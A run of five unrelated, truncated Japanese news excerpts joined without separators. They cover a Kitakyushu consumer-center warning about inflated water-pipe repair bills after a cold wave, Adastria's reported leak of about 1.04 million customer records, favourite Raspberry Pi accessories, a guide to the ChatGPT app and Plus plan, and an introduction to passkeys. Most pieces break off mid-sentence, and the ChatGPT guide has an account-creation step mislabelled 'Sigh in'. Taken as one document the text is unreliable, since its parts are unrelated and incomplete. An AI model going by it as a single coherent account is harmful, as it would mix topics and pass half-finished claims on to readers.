1月24日から日本列島に流入している強い寒波の影響で、各所でさまざまなトラブルの報告が上がっている。Twitterでは「水道管が凍結した」などの投稿も見られるが、北九州市立消費生活センターは「寒波の後、水道修理のトラブルがとても多い」と説明。ネット検索での修理業者探しは慎重に行うよう注意喚起している。 水道管が凍結により破裂した場合、付近から漏水が発生することがある。その修理をネット検索経由で事業者に依頼した際、事前にWebで提示していた金額よりも高額な料金を請求された……寒波後にはそんな相談が寄せられると北九州市立消費生活センターはTwitter（＠1Wu8LHOlfcD8oIT）上で紹介している。 70代男性が巻き込まれた事例では、Webには安価な金額が掲載されていたにもかかわらず、修理後にいきなり数十万円の料金を請求されたという。 北九州市立消費生活センターは、こうしたトラブルに巻き

衣料品の製造販売を手掛けるアダストリア（東京都渋谷区）は1月24日、18日早朝に受けた不正アクセスの影響で、100万件超の個人情報が漏えいした可能性があると発表した。同社は不正アクセスの影響で物流システムを停止しており、ファッションECサイト「ドットエスティ」のサービスも休止している。 漏えいの可能性があるのは、（1）2022年7月から23年1月17日の間に、ドットエスティから商品を受け取った、もしくは受け取り予定の人、（2）21年4月から23年1月17日の間に、店舗受け取りや自宅配送サービスを使った人、（3）19年8月から9月の間に、ドットエスティで商品を購入した人の一部──の、氏名、住所、電話番号、メールアドレス、アダストリア内での管理番号など104万4175件。 クレジットカード番号などの決済情報は含まれていない。同日時点では実際の漏えいも確認していないという。 個人情報保護委員会へ

「Raspberry Pi」の使用に関して筆者が気に入っていることの1つは、このシングルボードコンピューター（通称「SBC」）向けのアクセサリーが非常に豊富にあることだ。 想像できるものは、おそらく存在するだろう。 ディスプレイやケース、あらゆる種類のアドオンサーキットボード（Hardware Attached on Topを略してHATと呼ばれる）が提供されており、ポートを追加してハードドライブの接続や天気の観察といったことが可能だ。 むしろ、最近ではRaspberry Pi向けのアクセサリーの方が、Raspberry Pi本体より（はるかに）簡単にみつかる。非常に割高な販売価格を気にしないという人は別だが（原因は「サプライチェーンの問題」だ）。 幸運にもRaspberry Piが手元に何台かあるという人は、以下で紹介する筆者のお気に入りアクセサリーのトップ3を確認してほしい。 5インチ

アプリ版ChatGPTの使い方 ダウンロード後、画像左端のようなログイン画面が表示されるので、すでにアカウントを持っている場合は「log in」からログイン、アカウント開設がまだの方は「Sigh in」からアカウント開設を行ってください。 ログインが完了すると、以下の注意事項が表示されます。 「Continue」をタップするとChatGPTを利用し始めることができます。 ChatGPT Plusとは？有料版の料金や限定の新機能について ChatGPT Plusとは一言で言えばChatGPTのより先進的なモデルである「GPT-4」を使えるプランのことです。料金は20ドル/月(約3000円弱)です。 ChatGPT Plus(GPT-4)限定の新機能としては「音声出入力」、「画像やPDF、Wordファイルなどの入力」、WEBブラウジング機能や各種プラグインなどがあります。また、通常のチャットに

Apple、Google、Microsoftという3大OSベンダーが揃ってサポートを表明している「パスキー（Passkeys）」。パスキーを使うことで、パスワードが不要になり、フィッシングや成りすまし、流出などのセキュリティ問題が一気に解決するほか、パスワードをメモしたり覚えたりする必要がなくなる。果たして、パスキーによってパスワード不要の世界はやってくるのだろうか。 パスキーでログインはこう変わる パスキーとは一体何か？　理屈や背景を説明する前に、デモサイトの「Passkeys.io」にアクセスしてみるのが分かりやすい。パスキーは生体認証とセットの技術なので、指紋認証機能を備えたPCや、指紋／顔認証を備えたiPhone、Androidなどでアクセスしてみよう。